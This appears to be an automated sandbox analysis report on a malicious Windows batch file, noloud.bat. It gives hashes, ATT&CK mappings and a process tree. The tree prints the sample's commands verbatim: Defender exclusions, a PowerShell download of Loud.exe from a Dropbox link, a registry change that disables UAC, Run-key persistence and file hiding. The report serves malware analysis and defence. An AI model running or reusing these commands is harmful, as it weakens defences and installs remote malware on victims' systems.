a599fcae8f2c31fb4bf0fe02b30e4ee4bd23d599c6c3d9a571df508a470d690d

Analysis

max time kernel
122s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
24-11-2024 18:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

noloud.bat
Size

12KB
MD5

e435591eabd5596e754a7acaede7dca7
SHA1

2b1b728aae5d3e72fe4bc864559d0347489f995a
SHA256

a599fcae8f2c31fb4bf0fe02b30e4ee4bd23d599c6c3d9a571df508a470d690d
SHA512

3248a7cf8542068c126906b9db5e3fb0dde7ca123b7cf3f5375aad6b5c65bb909db5e3b5e127104e664b57eea4774d5283228533f01beb45b50ccdd3545e8f69
SSDEEP

384:gTYcpQyuPmhDGEhtKCR2XYmE2JdAp6EbW263JM3jXMIccK:gTYcpQyuPmhDGEhtKCReU2JdjES3JQj4

Score

10^/10

evasion execution persistence trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

2784 powershell.exe
2588 powershell.exe
2852 powershell.exe
472 powershell.exe
2720 powershell.exe
2612 powershell.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

pid	process
2784	powershell.exe
2588	powershell.exe
2852	powershell.exe
472	powershell.exe
2720	powershell.exe
2612	powershell.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Windows\\System32\\Microsoft\\MicrosoftAI.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Users\\Admin\\AppData\\Local\\PP2\\Loud.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\- = "C:\\Windows\\System32\\Microsoft\\MicrosoftAI.exe"	reg.exe

Modifies registry key 1 TTPs 7 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

1472 reg.exe
1944 reg.exe
316 reg.exe
1656 reg.exe
1176 reg.exe
2520 reg.exe
1088 reg.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

2852 powershell.exe
472 powershell.exe
2784 powershell.exe
2588 powershell.exe
2720 powershell.exe
2612 powershell.exe

pid	process
1472	reg.exe
1944	reg.exe
316	reg.exe
1656	reg.exe
1176	reg.exe
2520	reg.exe
1088	reg.exe

pid	process
2852	powershell.exe
472	powershell.exe
2784	powershell.exe
2588	powershell.exe
2720	powershell.exe
2612	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	472	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe

Suspicious use of WriteProcessMemory 54 IoCs

Processes:

cmd.exenet.exe

description	pid	process	target process
PID 2916 wrote to memory of 2412	2916	cmd.exe	net.exe
PID 2916 wrote to memory of 2412	2916	cmd.exe	net.exe
PID 2916 wrote to memory of 2412	2916	cmd.exe	net.exe
PID 2412 wrote to memory of 2136	2412	net.exe	net1.exe
PID 2412 wrote to memory of 2136	2412	net.exe	net1.exe
PID 2412 wrote to memory of 2136	2412	net.exe	net1.exe
PID 2916 wrote to memory of 2852	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 2852	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 2852	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 472	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 472	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 472	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 2784	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 2784	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 2784	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 2588	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 2588	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 2588	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 636	2916	cmd.exe	attrib.exe
PID 2916 wrote to memory of 636	2916	cmd.exe	attrib.exe
PID 2916 wrote to memory of 636	2916	cmd.exe	attrib.exe
PID 2916 wrote to memory of 2720	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 2720	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 2720	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 2612	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 2612	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 2612	2916	cmd.exe	powershell.exe
PID 2916 wrote to memory of 2520	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 2520	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 2520	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 1636	2916	cmd.exe	attrib.exe
PID 2916 wrote to memory of 1636	2916	cmd.exe	attrib.exe
PID 2916 wrote to memory of 1636	2916	cmd.exe	attrib.exe
PID 2916 wrote to memory of 828	2916	cmd.exe	attrib.exe
PID 2916 wrote to memory of 828	2916	cmd.exe	attrib.exe
PID 2916 wrote to memory of 828	2916	cmd.exe	attrib.exe
PID 2916 wrote to memory of 1088	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 1088	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 1088	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 1472	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 1472	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 1472	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 1944	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 1944	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 1944	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 316	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 316	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 316	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 1656	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 1656	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 1656	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 1176	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 1176	2916	cmd.exe	reg.exe
PID 2916 wrote to memory of 1176	2916	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid process

1636 attrib.exe
828 attrib.exe
636 attrib.exe

pid	process
1636	attrib.exe
828	attrib.exe
636	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\noloud.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2916
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\PP2'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\PP2'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Windows\System32\Microsoft'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\Windows\System32\Microsoft'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2588
- C:\Windows\system32\attrib.exe
  attrib +h "PP2" /s/d
  2⤵
  - Views/modifies file attributes
  PID:636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-Webrequest 'https://dl.dropboxusercontent.com/scl/fi/vmi505vr2w31tjb6b37ga/Loud.exe?rlkey=i5ewl9aw5z57ot2lpfi0n74y2&st=wufvc8k3&dl=0' -OutFile Loud.exe"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -Command "Invoke-WebrequestWindows_NT 'https://dl.dropboxusercontent.com/scl/fi/vmi505vr2w31tjb6b37ga/Loud.exe?rlkey=i5ewl9aw5z57ot2lpfi0n74y2&st=wufvc8k3&dl=0' -OutFile Loud.exe"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2612
- C:\Windows\system32\reg.exe
  reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  - UAC bypass
  - Modifies registry key
  PID:2520
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /s /d
  2⤵
  - Views/modifies file attributes
  PID:1636
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /s /d
  2⤵
  - Views/modifies file attributes
  PID:828
- C:\Windows\system32\reg.exe
  reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1088
- C:\Windows\system32\reg.exe
  reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1472
- C:\Windows\system32\reg.exe
  reg ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Windows\System32\Microsoft\MicrosoftAI.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1944
- C:\Windows\system32\reg.exe
  reg ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v - /t REG_SZ /d "C:\Windows\System32\Microsoft\MicrosoftAI.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:316
- C:\Windows\system32\reg.exe
  reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1656
- C:\Windows\system32\reg.exe
  reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v - /t REG_SZ /d "C:\Users\Admin\AppData\Local\PP2\Loud.exe" /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
83369889cf04a914fa87cb95e619d4e0

SHA1
7663edb02c4b39f9062c56b80a28ba7915b29d86

SHA256
2d2c7edce098b6b511322871a34e1ec7813ad06191473a9d4b3b98ab18624b75

SHA512
5cae49df35f702c2693db0a32a7fbe5d9382f22f97214672cb709cf866aad453f3e25d3347fb86ba7b12438366f4a37d71ec8ce95405c8d68084f37e22c5ec56

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/472-17-0x000000001B490000-0x000000001B772000-memory.dmp

Filesize
2.9MB

Download
memory/472-18-0x00000000022C0000-0x00000000022C8000-memory.dmp

Filesize
32KB

Download
memory/2852-4-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp

Filesize
4KB

Download
memory/2852-5-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download
memory/2852-6-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/2852-7-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2852-8-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2852-11-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp

Filesize
9.6MB

Download
memory/2852-10-0x0000000002B4B000-0x0000000002BB2000-memory.dmp

Filesize
412KB

Download
memory/2852-9-0x0000000002B44000-0x0000000002B47000-memory.dmp

Filesize
12KB

Download